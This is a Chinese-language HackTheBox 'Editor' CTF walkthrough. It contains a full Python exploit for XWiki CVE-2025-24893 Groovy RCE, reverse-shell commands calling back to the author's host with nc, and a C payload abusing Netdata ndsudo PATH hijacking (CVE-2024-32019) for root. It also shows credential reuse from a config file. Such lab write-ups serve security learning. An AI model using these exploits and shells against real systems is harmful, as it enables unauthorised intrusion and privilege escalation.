HackTheBox-Season8-Editor-Walkthrough

前言

网络配置

由于网络原因导致我打HTB延迟一直很高，完全没法玩的状态，懒得折腾了，最近换了个新机场，看起来延迟还行

玩个第八赛季easy的机器，试试水先

我的渗透测试环境是基于WSL所以有点麻烦，前面配置可以参考Windows11下安装WSL2_Kali踩坑记录 | Pepster’Blog

clash开启tun模式，使wsl中的网络环境可以走代理，然后wsl内启动openvpn连接htb，所以宿主机中的windows是没有htb网络连接的

如果你WSL的网络采用Mirror镜像模式，然后在windwos中启动openvpn会遇到一个很奇怪的Bug，就是windows中的环境可以连接到htb网络，而WSL中却不行，明明都是Mirror模式了，正常来说是可以连接宿主机中的所有网卡连接

官方的Github IssuesOpenVPN network is not accessible in WSL when connection established from (Windows Host OpenVPN Application), it is accessible only if the connection established inside WSL2 container. · Issue #13293 · microsoft/WSL也有人遇到同样的问题，只能硬等了，坐等官方修复或者哪位大佬有解决方案，至少当前我是没有能力解决😅

又正是因为openvpn是在wsl内部连接的，所以如果windows也想要连接的话，可以使用代理工具例如gost、ligolo-ng之类的

哪个顺手熟练用哪个，这里我采用ligolo-ng，因为这个代理工具不使用 SOCKS 代理或 TCP/UDP 转发器，直接TUN接口，在第三层网络层代理，对于只有一层代理会更加稳定一点

然而又遇到问题了，windwos无法ping通wsl内的openvpn的ip，麻了😅

信息收集

服务探测

❯ export ip=10.10.11.80
❯ nmap -sT -min-rate 5000 -p- $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-27 21:11 CST
Nmap scan report for 10.10.11.80
Host is up (0.21s latency).
Not shown: 65452 filtered tcp ports (no-response), 80 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 27.65 seconds
❯ nmap -sT -A -p 22,80,8080 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-27 21:25 CST
Nmap scan report for 10.10.11.80
Host is up (0.35s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Jetty(10.0.20)
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   186.07 ms 10.10.14.1
2   799.93 ms 10.10.11.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds

直接curl一下80端口

❯ curl 10.10.11.80 -L -v
*   Trying 10.10.11.80:80...
* Connected to 10.10.11.80 (10.10.11.80) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.10.11.80
> User-Agent: curl/8.14.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.18.0 (Ubuntu)
< Date: Wed, 27 Aug 2025 16:15:11 GMT
< Content-Type: text/html
< Content-Length: 154
< Connection: keep-alive
< Location: http://editor.htb/
* Ignoring the response-body
* setting size while ignoring
<
* Connection #0 to host 10.10.11.80 left intact
* Issue another request to this URL: 'http://editor.htb/'
* Could not resolve host: editor.htb
* shutting down connection #1
curl: (6) Could not resolve host: editor.htb

302重定向到域名，修改hosts

❯ echo "$ip editor.htb"|sudo tee -a /etc/hosts
Password:
10.10.11.80 editor.htb

浏览器分别访问一下

• 80端口

• 8080端口

CVE-2025-24893

发现版本为15.10.8

尝试寻找有无最新的CVE

CVE-2025-24893｜XWiki Platform远程代码执行漏洞（POC）-腾讯云开发者社区-腾讯云

XWiki Platform 15.10.10 - Remote Code Execution - Multiple webapps Exploit

我使用exploit-db的exp

由于Rce命令是硬编码的，让GPT稍微修改一下

import requests
import argparse # 导入 argparse 模块
import sys      # 导入 sys 模块用于退出状态码
from urllib.parse import urljoin # 用于更安全地拼接URL

# Banner
def display_banner():
    print("=" * 80)
    print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution")
    print("Exploit Author: Al Baradi Joy")
    print("GitHub Exploit: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
    print("=" * 80)

# Function to detect the target protocol (HTTP or HTTPS)
def detect_protocol(domain):
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"

    # Common headers for detecting protocol
    detection_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
    }

    try:
        print(f"[+] Trying HTTPS: {https_url}")
        # Added verify=False for self-signed certs common in testing environments
        response = requests.get(https_url, timeout=5, allow_redirects=True, verify=False, headers=detection_headers)
        if 200 <= response.status_code < 400:
            print(f"[✔] Target supports HTTPS: {https_url}")
            return https_url
        else:
            print(f"[-] HTTPS available but returned status code {response.status_code}, falling back to HTTP.")
    except requests.exceptions.RequestException as e:
        print(f"[-] HTTPS not available or error during check: {e}, falling back to HTTP.")

    try:
        print(f"[+] Trying HTTP: {http_url}")
        response = requests.get(http_url, timeout=5, allow_redirects=True, headers=detection_headers)
        if 200 <= response.status_code < 400:
            print(f"[✔] Target supports HTTP: {http_url}")
            return http_url
        else:
            print(f"[✖] Target explicitly returned status code {response.status_code} on HTTP. Exiting.")
            sys.exit(1) # Using sys.exit for consistent exit behavior
    except requests.exceptions.RequestException as e:
        print(f"[✖] Target is unreachable on both HTTP and HTTPS: {e}. Exiting.")
        sys.exit(1)

# Exploit function
def exploit(target_raw_url, command):
    # Clean up the input and detect protocol
    domain_part = target_raw_url.replace("http://", "").replace("https://", "").strip().rstrip('/')
    target_base_url = detect_protocol(domain_part)

    # Heuristic check for /xwiki context path
    # This part can be tricky. It's best if the user provides the exact base URL including /xwiki if applicable.
    # For now, we'll try to guess if it's missing.
    if "/xwiki" not in target_base_url.lower():
        print(f"[!] Warning: '/xwiki' missing in base URL. Attempting to add it: {target_base_url}/xwiki")
        target_base_url = urljoin(target_base_url + "/", "xwiki") # Use urljoin for robust path joining
        print(f"    New target base URL: {target_base_url}")


    # Essential headers for the exploit request
    exploit_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
    }

    # Construct the Groovy payload.
    # We escape double quotes within the command for Groovy string literal.
    # The payload template is: println("YOUR_COMMAND".execute().text)
    # This will be URL-encoded later by requests.get(params={...}).
    groovy_payload_template = "}}}{{async async=false}}{{groovy}}println(\"%s\".execute().text);println('EXPLOIT_SUCCESS'){{/groovy}}{{/async}}"

    # Escape double quotes in the user-provided command
    escaped_command = command.replace('"', '\\"')

    final_groovy_payload = groovy_payload_template % escaped_command

    # The full vulnerability path
    vulnerable_path = "/bin/get/Main/SolrSearch"

    # Use urljoin to construct the full exploit URL safely
    full_exploit_endpoint = urljoin(target_base_url + "/", vulnerable_path.lstrip('/'))

    # Prepare GET parameters, requests library will handle URL encoding of 'text'
    params = {
        'media': 'rss',
        'text': final_groovy_payload
    }

    try:
        # requests.get will automatically URL-encode the parameters, including 'text'
        print(f"[+] Sending exploit request to: {full_exploit_endpoint}")
        print(f"[+] Executing command: {command}")
        print(f"[+] Groovy Payload (pre-URL-encode): {final_groovy_payload[:100]}...") # Print snippet for debugging

        response = requests.get(
            full_exploit_endpoint,
            params=params,
            headers=exploit_headers,
            timeout=10,
            allow_redirects=True,
            verify=False # Ignore SSL certificate warnings
        )

        # Check if the exploit was successful by looking for EXPLOIT_SUCCESS marker
        # and potentially command output.
        if response.status_code == 200 and 'EXPLOIT_SUCCESS' in response.text:
            print("\n" + "="*80)
            print("[✔] Exploit successful! Groovy command executed.")

            # Attempt to extract command output
            # Look for the EXPLOIT_SUCCESS marker and previous content
            output_end_index = response.text.find('EXPLOIT_SUCCESS')
            if output_end_index != -1:
                # The command output should be just before 'EXPLOIT_SUCCESS'
                # We need to find the specific XML tag that contains the output
                # This could be within <description> or <title> tags depending on XWiki's RSS generation

                # A more robust way might be regex or actual XML parsing
                # For now, let's just grab a chunk before EXPLOIT_SUCCESS
                output_start_probe = response.text.rfind('<description>', 0, output_end_index)
                if output_start_probe != -1:
                    actual_output = response.text[output_start_probe + len('<description>') : output_end_index].split("</description>")[0].strip()
                    print("[+] Command Output:")
                    print(actual_output)
                else:
                    print("[-] Could not precisely extract command output. Full exploitable response snippet:")
                    print(response.text[output_end_index-200 : output_end_index]) # print a section before exploit success
            else:
                print("[-] 'EXPLOIT_SUCCESS' marker not found even though status 200. Check response.")
                print(f"[-] Full response snippet:\n{response.text[:500]}")

            print("="*80 + "\n")
            return True # Indicate success
        else:
            print(f"[✖] Exploit failed. Status code: {response.status_code}")
            print(f"[-] Response snippet:\n{response.text[:500]}")
            return False # Indicate failure

    except requests.exceptions.ConnectionError:
        print("[✖] Connection failed. Target may be down or URL is incorrect.")
    except requests.exceptions.Timeout:
        print("[✖] Request timed out. Target is slow or unresponsive.")
    except requests.exceptions.RequestException as e:
        print(f"[✖] Unexpected error during exploit request: {e}")
    return False

# Main execution
if __name__ == "__main__":
    display_banner()

    parser = argparse.ArgumentParser(
        description="XWiki Platform Remote Code Execution Exploit (CVE-2025-24893)"
    )
    # Required arguments
    parser.add_argument(
        "URL",
        help="Target XWiki base URL (e.g., http://wiki.example.com or http://wiki.example.com/xwiki)"
    )
    parser.add_argument(
        "COMMAND",
        help="Command to execute on the target (e.g., 'id', 'cat /etc/passwd', 'bash -c \"nc 10.10.14.47 1234 -e /bin/bash\"')"
    )

    args = parser.parse_args()

    # Pass arguments to the exploit function
    success = exploit(args.URL, args.COMMAND)

    sys.exit(0 if success else 1) # Exit with appropriate status code

捏吗的，一直报502，环境有点问题

现在可以成功执行了

❯ python3 exp.py http://wiki.editor.htb/xwiki 'id'
================================================================================
Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution
Exploit Author: Al Baradi Joy
GitHub Exploit: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
================================================================================
[+] Trying HTTPS: https://wiki.editor.htb/xwiki
[-] HTTPS not available or error during check: HTTPSConnectionPool(host='wiki.editor.htb', port=443): Max retries exceeded with url: /xwiki (Caused by NewConnectionError('<requests.packages.urllib3.connection.VerifiedHTTPSConnection object at 0x70e4af3f6e50>: Failed to establish a new connection: [Errno 111] Connection refused')), falling back to HTTP.
[+] Trying HTTP: http://wiki.editor.htb/xwiki
[✔] Target supports HTTP: http://wiki.editor.htb/xwiki
[+] Sending exploit request to: http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch
[+] Executing command: id
[+] Groovy Payload (pre-URL-encode): }}}{{async async=false}}{{groovy}}println("id".execute().text);println('EXPLOIT_SUCCESS'){{/groovy}}...

================================================================================
[✔] Exploit successful! Groovy command executed.
[-] Could not precisely extract command output. Full exploitable response snippet:
/1.1/</span></a></span>" version="2.0"&gt;<br/>&nbsp;&nbsp;&lt;channel&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;title&gt;RSS feed for search on [}}}<p>uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)</p><p>
================================================================================

用户提权

反弹个shell回来

监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100 • 172.17.0.1 • 172.19.0.1 • 10.10.14.47
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from editor~10.10.11.80-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Got reverse shell from editor~10.10.11.80-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/editor~10.10.11.80-Linux-x86_64/2025_08_28-01_29_54-407.log 📜
───────────────────────────────────────────────────────────
xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash

存在用户oliver

在xwiki的官方文档中说明了hibernate.cfg是数据库配置文件

得到theEd1t0rTeam99疑似密码的字符串

xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls
cache    hibernate.cfg.xml               lib          sun-web.xml         xwiki.cfg
classes  jboss-deployment-structure.xml  observation  version.properties  xwiki-locales.txt
fonts    jetty-web.xml                   portlet.xml  web.xml             xwiki.properties
xwiki@editor:/usr/lib/xwiki/WEB-INF$ cat hibernate.cfg.xml |grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>

猜测存在密码复用

尝试ssh连接一下

用户不存在sudo权限

❯ ssh oliver@10.10.11.80
oliver@10.10.11.80's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu Aug 28 01:53:48 AM UTC 2025

  System load:  0.31              Processes:             230
  Usage of /:   80.3% of 7.28GB   Users logged in:       0
  Memory usage: 54%               IPv4 address for eth0: 10.10.11.80
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Aug 28 01:53:49 2025 from 10.10.14.47
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
oliver@editor:~$ cat user.txt
842e03d05b62c82ee69cab5f625c4e26
oliver@editor:~$ sudo -l
[sudo] password for oliver:
Sorry, user oliver may not run sudo on editor.

Root提权

不过有个netdata程序存在suid权限

oliver@editor:~$ find / -perm -u=s -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

发现ndsudo存在本地提权漏洞

ndsudo: local privilege escalation via untrusted search path · Advisory · netdata/netdata

metasploit-framework/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb at master · rapid7/metasploit-framework

💀 Exploit for 📄 Netdata ndsudo 1.45.0 Privilege Escalation CVE-2024-32019💀 Exploit for 📄 Netdata ndsudo 1.45.0 Privilege Escalation CVE-2024-32019

不用msfconsole了，本地编译好exp传到靶机上

注意文件名必须是nvme

❯ cat exp.c
// suid_bash.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
int main() {
    setuid(0); // 设置用户 ID 为 root (0)
    setgid(0); // 设置组 ID 为 root (0)
    system("busybox nc 10.10.14.47 4444 -e /bin/bash"); 
    return 0;
}
❯ gcc exp.c -o nvme
----------------------
❯ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.11.80 - - [28/Aug/2025 10:53:46] "GET /nvme HTTP/1.1" 200 -
------------------------
oliver@editor:/tmp$ wget 10.10.14.47:8080/nvme
--2025-08-28 02:28:10--  http://10.10.14.47:8080/nvme
Connecting to 10.10.14.47:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16056 (16K) [application/octet-stream]
Saving to: ‘nvme’

nvme           100%[====>]  15.68K  90.1KB/s    in 0.2s

2025-08-28 02:28:10 (90.1 KB/s) - ‘nvme’ saved [16056/16056]

oliver@editor:/tmp$ chmod +x nvme
oliver@editor:/tmp$ PATH=/tmp:$PATH
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

监听端口

+] Got reverse shell from editor~10.10.11.80-Linux-x86_64 😍️ Assigned SessionID <3>
xwiki@editor:/usr/lib/xwiki/WEB-INF$
[!] Session detached ⇲

(Penelope)─(Session [1])> interact 3
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [3], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/editor~10.10.11.80-Linux-x86_64/2025_08_28-10_54_22-773.log 📜
───────────────────────────────────────────────────────────
root@editor:/tmp# cd ~
root@editor:/root# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
root@editor:/root# cat root.txt
1df17662e42c44f3a76493c7998a304c